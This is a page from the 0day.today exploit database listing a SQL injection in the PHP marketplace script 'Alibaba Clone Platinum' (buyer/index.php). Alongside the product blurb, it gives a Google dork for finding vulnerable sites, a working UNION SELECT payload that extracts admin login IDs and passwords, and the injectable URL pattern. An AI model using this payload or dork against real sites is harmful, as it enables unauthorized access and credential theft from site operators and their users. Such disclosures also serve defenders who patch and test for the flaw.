[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability

Author
GuN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12245
Category
web applications
Date add
14-05-2010
Platform
php
====================================================================
Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
====================================================================

Author      : GuN
Location    : Tunisia - Tunis - Lyc?e el Omrane
Time Zone   : GMT +1:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
  
Application : Alibaba Clone Platinum
Vendor      : http://www.alibabaclone.com/
Price       : $699 USD
Google Dork : allinurl:buyer/index.php?ProductID=
Overview    :B2B
 trading Marketplace Script clone of alibaba
Marketplace script is a
wonderful solution to launch your own business to
business and b2c site.
Script is packed with lot of features to provide a
very sound foundation
to your trading portal site.
 
   
 
Exploit:
~~~~~~~
-22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin--
 
   
  SQLi GuN:
  ~~~~~~~
    
  http://127.0.0.1/[patch]/buyer/index.php?ProductID=&BuyerID=



#  0day.today [2024-12-24]  #